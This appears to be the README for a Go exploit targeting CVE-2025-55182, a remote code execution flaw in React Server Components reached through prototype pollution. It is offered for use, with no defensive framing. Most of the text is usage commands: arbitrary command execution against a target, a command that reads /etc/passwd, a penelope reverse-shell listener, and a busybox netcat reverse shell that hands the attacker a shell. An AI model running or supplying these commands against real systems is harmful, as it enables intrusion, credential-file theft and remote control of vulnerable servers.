
Go-based exploit for CVE-2025-55182, achieving remote code execution in React Server Components via prototype pollution. Supports arbitrary command execution and reverse shell payloads.
Exploit for RCE in React Server Components via prototype pollution.
go run main.go -t <target> -c <command>
go run main.go -t http://127.0.0.1 -c "id"
go run main.go -t http://127.0.0.1 -c "ls -la"
go run main.go -t http://127.0.0.1 -c "cat /etc/passwd"
Setup revershell
penelope -i 0.0.0.0 -p 1337
Use busybox:
go run main.go -t http://127.0.0.1 -c "busybox nc 127.0.0.1 1337 -e sh"
go build -o exploit .